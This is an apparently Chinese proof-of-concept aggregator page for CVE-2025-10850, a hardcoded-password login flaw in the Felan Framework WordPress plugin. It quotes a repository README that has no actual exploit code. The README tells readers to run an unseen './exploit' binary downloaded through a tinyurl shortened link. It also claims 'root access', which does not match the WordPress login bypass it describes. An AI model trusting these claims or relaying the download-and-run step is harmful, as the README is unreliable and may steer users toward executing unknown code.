关联漏洞
标题:
WordPress plugin Felan Framework 信任管理问题漏洞
(CVE-2025-10850)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台具有在基于PHP和MySQL的服务器上架设个人博客网站的功能。WordPress plugin是一个应用插件。 WordPress plugin Felan Framework 1.1.4及之前版本存在信任管理问题漏洞,该漏洞源于fb_ajax_login_or_register函数和google_ajax_login_or_register函数中存在硬编码密
介绍
# CVE-2025-10850
## Overview
The Felan Framework plugin for WordPress contains a vulnerability that allows improper authentication due to hardcoded passwords in its login functions.
## Vulnerability Details
Specifically, this impacts users who log in using Facebook or Google social login features, as they may remain vulnerable if they did not change their default passwords. Attackers can exploit this flaw to log in as any existing user, thereby potentially gaining unauthorized access to sensitive user data and site functionalities.
### Key Points
- **Severity**: Critical
- **CVSS Score**: 9.8 (High)
- **Attack Vector**: Network
Understanding the nature of this vulnerability is crucial for system administrators and security professionals. Proper mitigation strategies can prevent unauthorized access.
### Important Note
Use this exploit responsibly and only on systems you own or have explicit permission to test.
## Example
Here is a simple example of how to use the exploit:
1. Open your terminal.
2. Run the exploit:
```bash
./exploit
```
3. If successful, you will see a message indicating that you have gained root access.
### Download [here](https://tinyurl.com/3mmysj2n)
文件快照
[4.0K] /data/pocs/364141e56ed726f7ee5a3a18a7b2b7dfd3d1bbd9
└── [1.2K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。